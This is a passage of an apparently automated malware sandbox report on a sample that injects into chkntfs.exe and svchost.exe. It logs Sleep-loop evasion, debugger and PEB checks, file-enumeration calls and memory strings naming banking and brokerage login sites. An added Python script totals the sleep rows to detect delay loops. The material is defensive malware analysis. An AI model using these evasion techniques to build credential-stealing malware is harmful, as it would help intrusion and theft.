                [C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe TID: 3192] Thread sleep time: -42000s >= -30000s
                [C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe TID: 3192] Thread sleep count: 40 > 30
                [C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe TID: 3192] Thread sleep time: -40000s >= -30000s
                [C:\Windows\SysWOW64\chkntfs.exe] Last function: Thread delayed (2 occurrences)
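The sleep rows above are more telling once they are totalled per thread. The script below does that as an added example; it is not Joe Sandbox code, and the rows in SAMPLE are copied from this report. The unit handling is an inference from the numbers on the page rather than something the report states: the sandbox prints the totals with an "s" suffix and a leading minus sign, but 2,418,000 / 1,209 calls = 2,000 per call and 17,528,000 / 8,764 = 2,000, which is what a loop around Sleep(2000) produces when the totals are in milliseconds, so the script treats them as milliseconds and drops the sign. Under that reading chkntfs.exe thread 6508 asked for roughly 5.5 hours of sleep in almost 10,000 calls, which is why the sandbox reports the thread as delaying.

```python
"""Total the sandbox's "Thread sleep count" / "Thread sleep time" rows per process and thread
and derive the per-call delay.  Added example, not Joe Sandbox code.  Values are treated as
milliseconds (an inference from the ratios on the page; the report prints them with an "s")."""
import re

ROW = re.compile(
    r"(?:Source:\s*)?\[?(?P<proc>.+?)\s+TID:\s*(?P<tid>\d+)\]?\s*"
    r"Thread sleep (?P<kind>count|time):\s*(?P<val>-?\d+)s?\s*>=?\s*(?P<thr>-?\d+)s?"
)

# Rows copied from the report, in the "[process TID: n] finding" layout used on this page.
SAMPLE = r"""
[C:\Windows\SysWOW64\chkntfs.exe TID: 6508] Thread sleep count: 1209 > 30
[C:\Windows\SysWOW64\chkntfs.exe TID: 6508] Thread sleep time: -2418000s >= -30000s
[C:\Windows\SysWOW64\chkntfs.exe TID: 6508] Thread sleep count: 8764 > 30
[C:\Windows\SysWOW64\chkntfs.exe TID: 6508] Thread sleep time: -17528000s >= -30000s
[C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe TID: 3192] Thread sleep time: -80000s >= -30000s
[C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe TID: 3192] Thread sleep time: -42000s >= -30000s
[C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe TID: 3192] Thread sleep count: 40 > 30
[C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe TID: 3192] Thread sleep time: -40000s >= -30000s
"""


def parse_rows(text):
    """Yield (process basename, tid, kind, value, threshold) for every sleep row; signs dropped."""
    for line in text.splitlines():
        m = ROW.search(line)
        if not m:
            continue
        proc = m.group("proc").rsplit("\\", 1)[-1]
        yield (proc, int(m.group("tid")), m.group("kind"),
               abs(int(m.group("val"))), abs(int(m.group("thr"))))


def summarize(text):
    """Per (process, TID): total Sleep calls, total requested milliseconds, and the per-call
    delay for every count row that is immediately followed by a time row (the sandbox emits
    them in that order for a single loop; unpaired time rows only add to the total)."""
    summary, pending = {}, {}
    for proc, tid, kind, val, _thr in parse_rows(text):
        key = (proc, tid)
        s = summary.setdefault(key, {"calls": 0, "total_ms": 0, "interval_ms": []})
        if kind == "count":
            s["calls"] += val
            pending[key] = val
        else:
            s["total_ms"] += val
            if key in pending:
                s["interval_ms"].append(val // pending.pop(key))
    return summary


def hours(ms):
    return round(ms / 3_600_000, 2)


def evasive(summary, min_calls=30, min_total_ms=30_000):
    """Threads past the sandbox's own thresholds from the rows (30 calls, 30 000 total)."""
    return [k for k, s in summary.items()
            if s["calls"] > min_calls and s["total_ms"] > min_total_ms]


if __name__ == "__main__":
    for (proc, tid), s in summarize(SAMPLE).items():
        print(f"{proc} TID {tid}: {s['calls']} calls, {hours(s['total_ms'])} h requested, "
              f"per-call {s['interval_ms']} ms")
```

Paste the sleep rows of any other report into SAMPLE to get the same per-thread view; a constant per-call interval across count/time pairs, as here, is the signature of a fixed Sleep() delay loop rather than a spread of natural waits.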
                [C:\Users\user\Desktop\1162-201.exe] Code function: 0_2_00C8D076 FindFirstFileW, DeleteFileW, DeleteFileW, MoveFileW, DeleteFileW, FindNextFileW, FindClose, FindClose
                [C:\Users\user\Desktop\1162-201.exe] Code function: 0_2_00C5C2A2 FindFirstFileExW
                [C:\Users\user\Desktop\1162-201.exe] Code function: 0_2_00C8D3A9 FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, FindClose
                [C:\Users\user\Desktop\1162-201.exe] Code function: 0_2_00C99642 SetCurrentDirectoryW, FindFirstFileW, FindFirstFileW, GetFileAttributesW, SetFileAttributesW, FindNextFileW, FindClose, FindFirstFileW, SetCurrentDirectoryW, SetCurrentDirectoryW, SetCurrentDirectoryW, FindNextFileW, FindClose, FindClose
                [C:\Users\user\Desktop\1162-201.exe] Code function: 0_2_00C9979D SetCurrentDirectoryW, FindFirstFileW, FindFirstFileW, FindNextFileW, FindClose, FindFirstFileW, SetCurrentDirectoryW, SetCurrentDirectoryW, SetCurrentDirectoryW, FindNextFileW, FindClose, FindClose
                [C:\Users\user\Desktop\1162-201.exe] Code function: 0_2_00C968EE FindFirstFileW, FindClose
                [C:\Users\user\Desktop\1162-201.exe] Code function: 0_2_00C9698F FindFirstFileW, FindClose, FileTimeToLocalFileTime, FileTimeToLocalFileTime, FileTimeToLocalFileTime, FileTimeToSystemTime, FileTimeToSystemTime, FileTimeToSystemTime
                [C:\Users\user\Desktop\1162-201.exe] Code function: 0_2_00C8DBBE lstrlenW, GetFileAttributesW, FindFirstFileW, FindClose
                [C:\Users\user\Desktop\1162-201.exe] Code function: 0_2_00C99B2B FindFirstFileW, Sleep, FindNextFileW, FindClose
                [C:\Users\user\Desktop\1162-201.exe] Code function: 0_2_00C95C97 FindFirstFileW, FindNextFileW, FindClose
                [C:\Windows\SysWOW64\chkntfs.exe] Code function: 6_2_0249CFA0 FindFirstFileW, FindNextFileW, FindClose
                [C:\Users\user\Desktop\1162-201.exe] Code function: 0_2_00C242DE GetVersionExW, GetCurrentProcess, IsWow64Process, LoadLibraryA, GetProcAddress, GetNativeSystemInfo, FreeLibrary, GetSystemInfo, GetSystemInfo
                [721e5H878.6.dr] Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                [721e5H878.6.dr] Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                [721e5H878.6.dr] Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                [721e5H878.6.dr] Binary or memory string: discord.comVMware20,11696487552f
                [721e5H878.6.dr] Binary or memory string: bankofamerica.comVMware20,11696487552x
                [chkntfs.exe, 00000006.00000002.4627180441.00000000075D7000.00000004.00000020.00020000.00000000.sdmp] Binary or memory string: formVMware20,11g
                [chkntfs.exe, 00000006.00000002.4627180441.00000000075D7000.00000004.00000020.00020000.00000000.sdmp] Binary or memory string: ropeVMware20,116
                [chkntfs.exe, 00000006.00000002.4627180441.00000000075D7000.00000004.00000020.00020000.00000000.sdmp] Binary or memory string: rs - HKVMware20,
                [721e5H878.6.dr] Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                [721e5H878.6.dr] Binary or memory string: ms.portal.azure.comVMware20,11696487552
                [chkntfs.exe, 00000006.00000002.4627180441.00000000075D7000.00000004.00000020.00020000.00000000.sdmp] Binary or memory string: rd.comVMware20,1
                [721e5H878.6.dr] Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                [721e5H878.6.dr] Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                [721e5H878.6.dr] Binary or memory string: global block list test formVMware20,11696487552
                [721e5H878.6.dr] Binary or memory string: tasks.office.comVMware20,11696487552o
                [chkntfs.exe, 00000006.00000002.4617121660.0000000002678000.00000004.00000020.00020000.00000000.sdmp] Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                [721e5H878.6.dr] Binary or memory string: AMC password management pageVMware20,11696487552
                [firefox.exe, 00000009.00000002.2890895632.0000023D9254C000.00000004.00000020.00020000.00000000.sdmp] Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                [721e5H878.6.dr] Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                [721e5H878.6.dr] Binary or memory string: interactivebrokers.comVMware20,11696487552
                [721e5H878.6.dr] Binary or memory string: dev.azure.comVMware20,11696487552j
                [chkntfs.exe, 00000006.00000002.4627180441.00000000075D7000.00000004.00000020.00020000.00000000.sdmp] Binary or memory string: /profileVMware20
                [721e5H878.6.dr] Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                [721e5H878.6.dr] Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                [721e5H878.6.dr] Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                [chkntfs.exe, 00000006.00000002.4627180441.00000000075D7000.00000004.00000020.00020000.00000000.sdmp] Binary or memory string: zure.comVMware20
                [OtAlYRopPg.exe, 00000007.00000002.4618897911.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp] Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
                [721e5H878.6.dr] Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                [721e5H878.6.dr] Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                [721e5H878.6.dr] Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                [721e5H878.6.dr] Binary or memory string: outlook.office365.comVMware20,11696487552t
                [721e5H878.6.dr] Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                [721e5H878.6.dr] Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                [721e5H878.6.dr] Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                [721e5H878.6.dr] Binary or memory string: outlook.office.comVMware20,11696487552s
                [1162-201.exe, 00000000.00000002.2172061482.0000000000F48000.00000004.00000020.00020000.00000000.sdmp] Binary or memory string: A1KvmCiZKdUEI0cVW@6
                [721e5H878.6.dr] Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                [721e5H878.6.dr] Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                [721e5H878.6.dr] Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                [721e5H878.6.dr] Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                [721e5H878.6.dr] Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                [C:\Windows\SysWOW64\svchost.exe] Process information queried: ProcessInformation
                [C:\Windows\SysWOW64\svchost.exe] Process queried: DebugPort
                [C:\Windows\SysWOW64\chkntfs.exe] Process queried: DebugPort
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_0327096E rdtsc
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_00418153 LdrLoadDll
                [C:\Users\user\Desktop\1162-201.exe] Code function: 0_2_00C52622 IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
                [C:\Users\user\Desktop\1162-201.exe] Code function: 0_2_00C242DE GetVersionExW, GetCurrentProcess, IsWow64Process, LoadLibraryA, GetProcAddress, GetNativeSystemInfo, FreeLibrary, GetSystemInfo, GetSystemInfo
                [C:\Users\user\Desktop\1162-201.exe] Code function: 0_2_00C44CE8 mov eax, dword ptr fs:[00000030h]
                [C:\Users\user\Desktop\1162-201.exe] Code function: 0_2_0314D050 mov eax, dword ptr fs:[00000030h]
                [C:\Users\user\Desktop\1162-201.exe] Code function: 0_2_0314D0B0 mov eax, dword ptr fs:[00000030h]
                [C:\Users\user\Desktop\1162-201.exe] Code function: 0_2_0314BA20 mov eax, dword ptr fs:[00000030h]
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_03308324 mov eax/ecx, dword ptr fs:[00000030h] (4 reads: 3 eax, 1 ecx)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h] (3 reads)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_0322C310 mov ecx, dword ptr fs:[00000030h]
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_03250310 mov ecx, dword ptr fs:[00000030h]
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_032D437C mov eax, dword ptr fs:[00000030h]
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] (15 reads)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_032B035C mov eax/ecx, dword ptr fs:[00000030h] (6 reads: 5 eax, 1 ecx)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_032FA352 mov eax, dword ptr fs:[00000030h]
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_032D8350 mov ecx, dword ptr fs:[00000030h]
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_0330634F mov eax, dword ptr fs:[00000030h]
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h] (3 reads)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_0325438F mov eax, dword ptr fs:[00000030h] (2 reads)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h] (3 reads)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] (8 reads)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h] (3 reads)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_032663FF mov eax, dword ptr fs:[00000030h]
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_032EC3CD mov eax, dword ptr fs:[00000030h]
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h] (6 reads)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h] (4 reads)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_032B63C0 mov eax, dword ptr fs:[00000030h]
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_032DE3DB mov eax/ecx, dword ptr fs:[00000030h] (4 reads: 3 eax, 1 ecx)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h] (2 reads)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_0322823B mov eax, dword ptr fs:[00000030h]
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h] (3 reads)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_0322826B mov eax, dword ptr fs:[00000030h]
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] (12 reads)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_032B8243 mov eax/ecx, dword ptr fs:[00000030h] (2 reads: 1 eax, 1 ecx)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_0330625D mov eax, dword ptr fs:[00000030h]
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_0322A250 mov eax, dword ptr fs:[00000030h]
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_03236259 mov eax, dword ptr fs:[00000030h]
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h] (2 reads)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_032C62A0 mov eax/ecx, dword ptr fs:[00000030h] (6 reads: 5 eax, 1 ecx)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h] (2 reads)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h] (3 reads)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h] (3 reads)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h] (5 reads)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_033062D6 mov eax, dword ptr fs:[00000030h]
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_03260124 mov eax, dword ptr fs:[00000030h]
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_032DE10E mov eax/ecx, dword ptr fs:[00000030h] (10 reads: 6 eax, 4 ecx)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_032DA118 mov eax/ecx, dword ptr fs:[00000030h] (4 reads: 3 eax, 1 ecx)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_032F0115 mov eax, dword ptr fs:[00000030h]
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_03304164 mov eax, dword ptr fs:[00000030h] (2 reads)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_032C4144 mov eax/ecx, dword ptr fs:[00000030h] (5 reads: 4 eax, 1 ecx)
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_0322C156 mov eax, dword ptr fs:[00000030h]
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_032C8158 mov eax, dword ptr fs:[00000030h]
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03270185 mov eax, dword ptr fs:[00000030h]2_2_03270185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]2_2_032EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]2_2_032EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]2_2_032D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]2_2_032D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033061E5 mov eax, dword ptr fs:[00000030h]2_2_033061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032601F8 mov eax, dword ptr fs:[00000030h]2_2_032601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]2_2_032F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]2_2_032F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A020 mov eax, dword ptr fs:[00000030h]2_2_0322A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C020 mov eax, dword ptr fs:[00000030h]2_2_0322C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6030 mov eax, dword ptr fs:[00000030h]2_2_032C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4000 mov ecx, dword ptr fs:[00000030h]2_2_032B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325C073 mov eax, dword ptr fs:[00000030h]2_2_0325C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232050 mov eax, dword ptr fs:[00000030h]2_2_03232050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6050 mov eax, dword ptr fs:[00000030h]2_2_032B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032280A0 mov eax, dword ptr fs:[00000030h]2_2_032280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C80A8 mov eax, dword ptr fs:[00000030h]2_2_032C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F60B8 mov eax, dword ptr fs:[00000030h]2_2_032F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F60B8 mov ecx, dword ptr fs:[00000030h]2_2_032F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323208A mov eax, dword ptr fs:[00000030h]2_2_0323208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0322A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032380E9 mov eax, dword ptr fs:[00000030h]2_2_032380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B60E0 mov eax, dword ptr fs:[00000030h]2_2_032B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C0F0 mov eax, dword ptr fs:[00000030h]2_2_0322C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032720F0 mov ecx, dword ptr fs:[00000030h]2_2_032720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B20DE mov eax, dword ptr fs:[00000030h]2_2_032B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]2_2_0326C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]2_2_0326C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]2_2_0326273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov ecx, dword ptr fs:[00000030h]2_2_0326273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]2_2_0326273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AC730 mov eax, dword ptr fs:[00000030h]2_2_032AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C700 mov eax, dword ptr fs:[00000030h]2_2_0326C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230710 mov eax, dword ptr fs:[00000030h]2_2_03230710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260710 mov eax, dword ptr fs:[00000030h]2_2_03260710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238770 mov eax, dword ptr fs:[00000030h]2_2_03238770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov esi, dword ptr fs:[00000030h]2_2_0326674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]2_2_0326674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]2_2_0326674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230750 mov eax, dword ptr fs:[00000030h]2_2_03230750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE75D mov eax, dword ptr fs:[00000030h]2_2_032BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]2_2_03272750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]2_2_03272750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4755 mov eax, dword ptr fs:[00000030h]2_2_032B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032307AF mov eax, dword ptr fs:[00000030h]2_2_032307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E47A0 mov eax, dword ptr fs:[00000030h]2_2_032E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D678E mov eax, dword ptr fs:[00000030h]2_2_032D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE7E1 mov eax, dword ptr fs:[00000030h]2_2_032BE7E1
